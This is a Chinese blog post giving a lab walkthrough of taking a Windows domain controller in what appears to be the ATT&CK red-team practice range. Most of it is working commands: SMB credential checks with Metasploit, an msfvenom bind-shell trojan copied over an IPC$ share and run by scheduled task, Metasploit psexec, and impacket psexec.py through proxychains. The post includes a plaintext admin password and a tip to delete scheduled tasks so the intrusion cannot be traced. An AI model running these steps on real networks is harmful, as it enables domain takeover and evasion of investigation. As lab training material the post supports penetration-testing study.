内网横向渗透 之 ATT&CK系列一 之 拿下域控制器

信息收集

信息收集 域控制器的相关信息:

通过arp扫描发现域控制器的ip地址为:192.168.52.138,尝试使用msf的smb_login模块登录smb是否成功

1 search smb_login
2 use 0
3 set rhosts 192.168.52.138
4 set smbpass hongrisec@2022
5 set smbuser Administrator
6 set smbdomain GOD
7 run

用户名、密码、domain我在前面一篇文章中已经获取到了,所以这里不再赘述,如果还不了解获取方式的,烦请移步至文章《内网横向渗透 之 ATT&CK系列一 之 信息收集》中查看(已附超链接),上图表示用户名以及密码是正确的。

拿下域控

一、IPC$搭配msf木马

因为是内网域,目标主机不出网,所以 payload 使用 正向连接 (bind)

1 # 生成木马
2 msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.52.138 LPORT=3333 -f exe -o bind.exe
3 # 然后通过蚁剑上传至跳板机(win7)

使用 跳板机(win7) 进行空管链接(IPC$)

1 # IPC$ 远程登录目标主机
2 net use \\192.168.52.138\ipc$ /user:Administrator "hongrisec@2022"

提示:命令执行成功,下一步

1 # 复制后门到域控的temp目录下
2 copy bind.exe \\192.168.52.138\c$\bind.exe

查看是否上传成功:

1 # 查看指定目录下的文件
2 dir \\192.168.52.138\c$

创建计划任务

1 # 查看目标主机的时间
2 net time \\192.168.52.138
3 # 创建该时间之后的某个时刻计划任务,任务名 spmonkey
4 at \\192.168.52.138 12:40:00 c:\bind.exe
7 # 删除创建的任务
8 at \\192.168.52.138 2 /delete

返回msf监听端口

1 exit # 退出shell模式
2 backgroud # 后台运行session
3 use exploit/multi/handler
4 set payload windows/meterpreter/bind_tcp
5 set RHOST 192.168.52.138
6 set LPORT 3333
7 run
8 # 静候计划任务执行

当计划任务的时间到了后,依然没有会话回来,这个拿shell方式宣告失败!

注:计划任务执行完后,记得使用命令删除任务,不然会被溯源。

二、利用msf中的psexec模块拿下域控

psexec科普

psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开机3389端口,只需要对方开启admin$共享(该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于psexec是windows提供的工具,所以杀毒软件会将其添加到白名单中。

psexec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为"PSEXESVC"的二进制文件。然后,通过psexec服务运行命令,运行结束后删除服务。

在使用psexec执行远程命令时,会在目标系统中创建一个psexec服务。命令执行后,psexec服务将会被自动删除。由于创建或删除服务时会产生大量的日志,所以会在攻击溯源时通过日志反推攻击流程。

1 search psexec # 查找psexec模块
2 use exploit/windows/smb/psexec
3 set payload windows/meterpreter/bind_tcp
4 set RHOSTS 192.168.52.138
5 set SMBPass hongrisec@2022
6 set SMBUser Administrator
7 set SMBDomain GOD
8 run

攻击成功了,但是没有生成session,这个方式也宣告失败!

三、利用python的psexec脚本拿下域控

经过查阅各种资料,发现有个psexec的python脚本,在这里感谢写这个脚本的师傅:beto (@agsolino)

在kali中使用git获取脚本:git clone https://github.com/CoreSecurity/impacket.git,将kali的python版本修改至 3.*,cd进入impacket目录,运行python setup.py install,待执行完成后,准备工作就完成了。

开始拿下域控:

1、查找psexec脚本所在目录并进入目录

1 find . -name "psexec*"

2、使用代理隧道运行psexec.py脚本

1 proxychains python psexec.py 'Administrator:hongrisec@2022@192.168.52.138'

其中 ' ' 的值分别为 用户名:密码@目标主机ip地址

成功返回shell,查看权限

进入目录删除前面上传的msf木马

1 cd C:\
2 del/f/s/q C:\bind.exe

鸣谢

beto (@agsolino)

结语

到这里,拿下域控后,ATT&CK系列一 也就告一段落了,涉及到的知识点比较多,有不懂的师傅可以加我vx:fbi041699,备注明来意喔!

 

posted @ 2022-05-12 13:22  spmonkey  阅读(94)  评论(0编辑  收藏  举报